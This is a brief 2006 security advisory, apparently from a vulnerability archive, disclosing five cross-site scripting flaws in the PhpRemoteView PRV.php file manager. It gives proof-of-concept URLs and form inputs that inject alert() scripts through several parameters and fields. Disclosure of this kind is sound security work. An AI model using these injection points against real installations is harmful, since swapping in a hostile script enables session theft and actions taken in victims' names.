Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12680
HistoryMay 16, 2006 - 12:00 a.m.

PhpRemoteView Multiple Xss Vulnerabilities

2006-05-1600:00:00
vulners.com
12

PhpRemoteView Multiple Xss Vulnerabilities

Site:

http://php.spb.ru/remview/

Bug:

1- http://victim/path/PRV.php?&c=v&d=[path]&f="><script>alert(/Soot/)</script>

2- http://victim/path/PRV.php?c=l&d="><script>alert(/Soot/)</script>

3-http://victim/path/PRV.php?c=setup&ref="><script>alert(/Soot/)</script>

4-http://victim/path/PRV.php?c=d&d=[path]
MAKE DIR (type full path) : "><script>alert(/Soot/)</script>

5-http://victim/path/PRV.php?c=d&d=[path]
Full file name : "><script>alert(/Soot/)</script>


Source :
http://soot.shabgard.org/bugs/phpremoteview.txt

Credit :
Soot
Shabgard Security Team
http://www.shabgard.org

Greetz :
Hregy,Elite,Bl2k,Littlehacker